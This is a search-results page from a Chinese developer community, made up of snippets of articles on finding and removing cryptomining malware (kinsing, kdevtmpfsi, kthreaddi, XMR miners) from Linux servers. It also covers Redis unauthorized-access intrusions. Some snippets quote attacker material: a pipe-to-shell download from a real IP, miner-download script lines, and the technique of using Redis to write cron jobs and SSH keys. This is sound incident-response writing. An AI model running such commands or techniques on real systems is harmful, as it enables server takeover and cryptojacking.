linux挖矿程序_挖矿程序_ecs挖矿程序 - 腾讯云开发者社区 - 腾讯云

开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

linux——挖矿程序处理

记一次挖矿程序入侵以及解决实操！ 1，过程记录系统被挖矿程序入侵，导致系统CPU飙升。kill掉进程后自动重启。...发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/149391.html原文链接：https://javaforall.cn

2.1K2 0

Linux清理挖矿程序

Linux清理挖矿程序@bug Linux清理挖矿程序最近服务器经常被挖矿，一些经验 1....找到挖矿程序挖矿程序跑起来几乎占满了所有的CPU，以及GPU，用watch -n1 nvidia-smi可以实时看到挖矿程序的PID号，此时不能用kill -9 PID号来进行清除，会发现它换一个PID...使用top可以看到挖矿程序进程名字xxx（command一行），ps aux|grep xxx 或者ls -l /proc/{PID号}/exe 找到病毒程序的路径位置 2....删除病毒的定时程序 1.低级版的病毒，crontab -l 可以看到病毒程序的定时任务，crontab -e编辑删除 2.高级点的病毒，crontab -l查看不到病毒程序的定时任务，因此cat /etc.../crontab去找到定时任务，编辑删除 3.删除源文件 kill -9 PID 号，这时候就有用啦把之前病毒源文件一并删除 4.加强电脑安防，愿天下无毒发布者：全栈程序员栈长，转载请注明出处：https

2.1K3 0

您找到你想要的搜索结果了吗？

是的

没有找到

linux清除隐藏的挖矿程序

1.找出cpu高的程序，top找不到的话，用下面命令 ps -aux --sort=-pcpu|head -10 2.杀掉相关进程 kill -9 pid 3.查看crontab是否有定时任务 4.删除相关命令...libiacpkmn.so.3" #查找文件，确认已经删除OK [root@dbserver ~]# 5.查看 /etc/rc.d/init.d/和/usr/bin/是否有软连接发布者：全栈程序员栈长

2.4K5 0

linux挖矿病毒工具,Linux服务器挖矿病毒

攻击者通过Redis未授权访问，写入定时任务，执行挖矿程序。...tmp/conn /tmp/conn: PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced 首先下载了一个图片，然后通过dd提取出来挖矿程序...[root@server120 tmp]# file /tmp/conns /tmp/conns: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux...这种通过Redis未授权拿服务器挖矿的情况很常见。处理过程 1)redis增加认证，清空/var/spool/cron/root和authorized_keys。...2)删除后门 3)Kill异常进程 4)重启发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/131889.html原文链接：https://javaforall.cn

3.1K2 0

linux 中了挖矿病毒

文章目录中毒特征磁盘cpu 跑满 100% 如何处理反复发作中毒特征磁盘cpu 跑满 100% 如何处理电脑中了挖矿病毒 ps -aux | grep kinsing root 19447...//195.3.146.118/h2.sh | sh > /dev/null 2>&1 pkill -9 kinsing ps -aux | grep kinsing 终于删掉了发布者：全栈程序员栈长

2K1 0

centos挖矿程序解决

centos挖矿程序解决第一种办法： 1.top找到cup占比最高的程序 2.ps -aux|grep COMMAND 3.crontab -l 查看定时任务 4.然后删除挖矿脚本和定时任务脚本...不行就直接执行下一步） 4.kill 掉病毒进程 5.service stop crond 或者 crontab -r 删除所有的执行计划 6.执行top 查看过一会还有没有进程发布者：全栈程序员栈长

5541 0

Linux被kdevtmpfsi 挖矿病毒入侵

Linux被kdevtmpfsi挖矿病毒入侵一....错误信息二.解决问题 1.首先停掉kdevtmpfsi的程序 2.删除Linux下的异常定时任务 3.结束kdevtmpfsi进程及端口占用 4.删除掉kdevtmpfsi的相关文件三.怎么预防处理这个病毒...有个最大的问题是：top命令查看自己服务器CPU运行情况，会发现kdevtmpfsi的进程，CPU使用率为100%，第一次删除干净了kdevtmpfsi程序，没曾想几分钟以后，就出现了第二个警告。...1.首先停掉kdevtmpfsi的程序 ps aux 找到kdevtmpfsi的进程删除掉与kdevtmpfsi相关的进程 kill -9 20267 kill -9 20367 2.删除Linux...如有错误，还望指正发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/138680.html原文链接：https://javaforall.cn

2.8K2 0

Linux 挖矿程序把病毒文件锁住了，删不了，怎么破？（chattr）

有幸，遇到过几次挖矿病毒，Linux 主机的关键命令都被删除替换，病毒文件被加了 i 只读权限，变成只读文件，root 无法修改删除！????...chattr 就是这个命令，设置只读加 i，万恶的挖矿程序必然会删除这个命令，因此需要去同版本的其他正常主机拷贝，否则，无法使用该命令！

2.2K5 1

linux实战清理挖矿病毒kthreaddi

BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件,里面就有我需要的top命令。...> busybox top image-20210629223207356 终于看到了这个kthreaddi进程,上网一查这个东西叫门罗币挖矿木马,伪装的实现是太好了和系统中的正常进程kthreadd...清理门罗币挖矿木马常规方式先试试 > kill -9 6282 过一会又起来了,说明有守护进程检查系统中的定时任务 > crontab -l 0 * * * * /tmp/sXsdc 发现一个这...一顿操作,观察了一会发现又出来0 * * * * /tmp/xss00,可执行程序的名字还变,看来处理这个无济于事,这些文件都是二进制的,直接打开查看,也看不出啥。...pid reboot重启总结本次服务器被挖矿,有可能是docker没有TLS通讯加密,也有可能是redis的弱密码,被入侵。

1.9K3 1

linux实战清理挖矿病毒 kthreaddi

BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件,里面就有我需要的top命令。...> busybox top [image-20210629223207356] 终于看到了这个kthreaddi进程,上网一查这个东西叫门罗币挖矿木马,伪装的实现是太好了和系统中的正常进程kthreadd...一顿操作,观察了一会发现又出来0 * * * * /tmp/xss00,可执行程序的名字还变,看来处理这个无济于事,这些文件都是二进制的,直接打开查看,也看不出啥。...pid reboot重启总结本次服务器被挖矿,有可能是docker没有TLS通讯加密,也有可能是redis的弱密码,被入侵。...原文链接:https://rumenz.com/rumenbiji/linux-kthreaddi.html

1.7K0 0

Linux应急响应（三）：挖矿病毒

0x00 前言随着虚拟货币的疯狂炒作，利用挖矿脚本来实现流量变现，使得挖矿病毒成为不法分子利用最为频繁的攻击方式。...新的挖矿攻击展现出了类似蠕虫的行为，并结合了高级攻击技术，以增加对目标服务器感染的成功率，通过利用永恒之蓝（EternalBlue）、web攻击多种漏洞（如Tomcat弱口令攻击、Weblogic WLS...组件漏洞、Jboss反序列化漏洞、Struts2远程命令执行等），导致大量服务器被感染挖矿程序的现象。...D、漏洞修复升级struts到最新版本 0x03 防范措施针对服务器被感染挖矿程序的现象，总结了几种预防措施： 1、安装安全软件并升级病毒库，定期全盘扫描，保持实时防护 2、及时更新 Windows

1.9K3 0

linux实战清理挖矿病毒kthreaddi

BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件,里面就有我需要的top命令。...> busybox top 图片终于看到了这个kthreaddi进程,上网一查这个东西叫门罗币挖矿木马,伪装的实现是太好了和系统中的正常进程kthreadd太像了。...一顿操作,观察了一会发现又出来0 * * * * /tmp/xss00,可执行程序的名字还变,看来处理这个无济于事,这些文件都是二进制的,直接打开查看,也看不出啥。...本次服务器被挖矿,有可能是docker没有TLS通讯加密,也有可能是redis的弱密码,被入侵。...原文链接:https://rumenz.com/rumenbiji/linux-kthreaddi.html

2.2K3 1

《绝地求生》辅助程序暗藏挖矿木马

腾讯电脑管家近日捕获的HSR币挖矿木马，隐藏在“绝地求生”辅助程序中，而由于“绝地求生”对电脑性能要求较高，不法分子瞄准”绝地求生”玩家电脑，相当于找到了“绝佳”的挖矿机器。...tlwgft此时属于辅助主界面程序，负责辅助的更新，模块投放，以及挖矿木马投放。主程序启动后，联网访问一份进程列表。 ?...程序基于ccMiner 2.0开源挖矿程序，ccMiner是基于NVIDIA GPU的挖矿程序，兼容windows，Linux，目前支持包括bitcoin 、HSR、Sibcoin 在内的58种虚拟币的挖掘...经验证，该加速器同样被植入挖矿木马： ? 已知这两款程序是由某网吧联盟团队开发，在BBS上也可以发现绝地求生小辅助，而且下载量也过万。 ?...此外，下载站也在疯狂传播该辅助程序。经分析，网上搜索“吃鸡”、“绝地求生”等关键词，在搜索页面置顶的下载站辅助程序同样携带挖矿木马。从图可知，仅通过该下载器下载辅助的人次就已高达10万。 ?

1.5K7 0

Linux 中挖矿病毒处理过程

分享一次Linux系统杀毒的经历，还有个人的一些总结，希望对大家有用。进程占CPU 700%，进程名字是类似XY2Arv的6位随机大小写字母+数字的字符串。...最终发现是一个叫systemd或trump的病毒，是一个挖矿的病毒，在挖一种叫门罗币（XMR）的数字货币。...该病毒的侵入方式是通过扫描主机的Redis端口，一般默认为6379，通过Redis命令将程序注入到你的主机，Redis 默认情况下，会绑定在 0.0.0.0:6379，在没有利用防火墙进行屏蔽的情况下，...authotrized_keys 文件中，进而可以直接登录目标服务器；如果Redis服务是以root权限启动，可以利用该问题直接获得服务器root权限整个入侵流程大概是包含以下几个环节： 1、扫描开放6379端口的Linux...文件里的利用命令将Redis的数据文件修改为/var/spool/cron/root，然后通过在Redis中插入数据，将下载执行脚本的动作写入crontab任务 3、通过脚本实现以上的相关行为，完成植入并启动挖矿程序

1.8K1 0

《绝地求生》辅助程序暗藏挖矿木马

腾讯电脑管家近日捕获的HSR币挖矿木马，隐藏在“绝地求生”辅助程序中，而由于“绝地求生”对电脑性能要求较高，不法分子瞄准”绝地求生”玩家电脑，相当于找到了“绝佳”的挖矿机器。...tlwgft此时属于辅助主界面程序，负责辅助的更新，模块投放，以及挖矿木马投放。主程序启动后，联网访问一份进程列表。 ?...程序基于ccMiner 2.0开源挖矿程序，ccMiner是基于NVIDIA GPU的挖矿程序，兼容windows，Linux，目前支持包括bitcoin 、HSR、Sibcoin 在内的58种虚拟币的挖掘...经验证，该加速器同样被植入挖矿木马： ? 已知这两款程序是由某网吧联盟团队开发，在BBS上也可以发现绝地求生小辅助，而且下载量也过万。 ?...此外，下载站也在疯狂传播该辅助程序。经分析，网上搜索“吃鸡”、“绝地求生”等关键词，在搜索页面置顶的下载站辅助程序同样携带挖矿木马。从图可知，仅通过该下载器下载辅助的人次就已高达10万。 ?

1.4K7 0

第一次遭遇挖矿程序

挖矿程序分析 x 文件,文件下载后首先执行x文件 # vim x nohup ....> bash.pid 这个核心文件就是读出操作系统的硬件架构，如果是i386就执行32位的h32和md32，猜测h32是用于让系统显示的进程名称，md32才是真正的挖矿程序。...过程总结找系统漏洞->获取权限->创建目录->上传文件->执行x，执行a->a启动crontab执行upd，生成upd并赋权->upd去执行run->run去执行真正的挖矿程序。...清除挖矿程序 1. kill 掉可疑进程,删除程序目录 # kill -9 19078 && rm -rf /tmp/.n && rm -rf /tmp/.a 2....修改 vmuser 用户密码注意到挖矿程序都是 vmuser 用户，所以修改 vmuser 用户密码 # passwd vmuser 入侵检测不放心，使用 rkhunter 检测一下 1.

1.3K4 0

Redis被黑客攻击,挟持为挖矿程序

然后利用 Redis 未授权访问漏洞执行 Redis 命令：这样就将定时任务和脚本注入到了我们机器当中，就会开始执行 init.sh 脚本 init.sh 主要功能是：关闭selinux、杀掉别人的挖矿进程...、杀掉CPU占用过高的进程，如果是自己就跳过、修改破坏系统命令、自己造一个下载器downloads()函数、解锁和加锁定时任务、添加挖矿技术任务、设置SSH免密登陆、下载执行矿机挖矿程序、关闭防火墙、清除日志...三解决方案 1.清理定时任务以及相关伪装的挖矿进程 2.redis设置密钥 3.服务器相关安全组更新，管好进出口附：摘一部分脚本给大家看下 #!...-${ARCH} ]; then /usr/local/cloudmonitor/CmsGoAgent.linux-${ARCH} stop && /usr/local/cloudmonitor...=$MOxmrigSTOCK echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz" if !

5431 0

eth挖矿软件_PI挖矿

geth –port 33333 –rpc –rpcapi eth –rpcaddr 192.168.10.176 –rpcport 8888 console 2 启动ethminer（挖矿软件...127.0.0.1:1234 –opencl-device 0 –opencl-platform 1 注意：只需要执行以上两步操作，不要添加其他参数或者启动后执行miner.start（）操作 -G：启动GPU挖矿...（通过opencl调用GPU挖矿） -P：geth地址 –opencl-device x ：x代表启动的Gpu数量，默认全部启动注意：启动GPU挖矿需要geth节点设置为挖矿节点才可以启动挖矿，并且geth...的disk IO速度应该足够快，否则数据同步速度不能跟上主网区块产生速度，也无法挖矿....发布者：全栈程序员栈长，转载请注明出处：https://javaforall.cn/184101.html原文链接：https://javaforall.cn

1.6K3 0

处理服务器恶意程序 kthreaddi挖矿

再次经历了服务器中恶意程序，一开始是ssh 服务器连接不上没反应，索性直接重启了服务器这才能连接上服务器得终端这台服务器之前运行着nexus私服同事突然跟我说连接不上nexus了我通过网页访问.../nexus run 看到了运行到中间得时候程序就突然被kill了这个时候我直接就查看了主机得运行资源 #查看运行内存 free -h #查看硬盘内存 df -h #查看CPU使用率 top...从上top图可以看出有一个名为kthreaddi得进程一直跑满了CPU,所以会导致了最开始登录不上服务器、程序运行不久会被kill。...-9 程序pid 他会重新生成新的程序继续跑慢你的cpu 根据之前得处理恶意程序得经验我看一下计划性任务如上看到了一个任务是在nexus文件夹下得东西 rm -rf ........./fofx5san #进行删除然后在修改定时任务 crontab -e 进去之后直接dd删除这行然后继续kill -9 程序pid 发现并不管用还是会生成新的恶意程序，同样还会生成新的计划性任务

8662 0

查杀 libudev.so 和 XMR 挖矿程序记录

这两天使用的公网服务器被入侵了，而且感染了不止一种病毒：一种是 libudev.so，是 DDoS 的客户端，现象就是不停的向外网发包，也就是超目标发起 DDoS 攻击；另外一种是挖矿程序，除了发包之外...该程序还会同时启动多个进程来监控 libudev.so 进程是否被杀掉，如果被关掉了，会再把 libudev.so 拉起来，而且这个监控进程为了防止备关掉，还会不停的变换自己的进程名和进程号，这就给查杀带来了更大的难度...XMR 挖矿程序 2.1 病毒特征第二种病毒是门罗币（XMR）挖矿程序，门罗币似乎是今年年初涨得很快，所以用病毒入侵挖矿的手法也就出现了，病毒主要是通过下载脚本，运行后下载并启动挖矿程序来工作，脚本的内容如下...，关于脚本的代码分析见于：XMR恶意挖矿案例简析，里面讲的非常详细。...参考资料 XMR恶意挖矿案例简析金山云安珀实验室千里追踪75万台“肉鸡”控制源记一次排除十字符libudev.so病毒的过程 FreeBuf

1.4K5 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭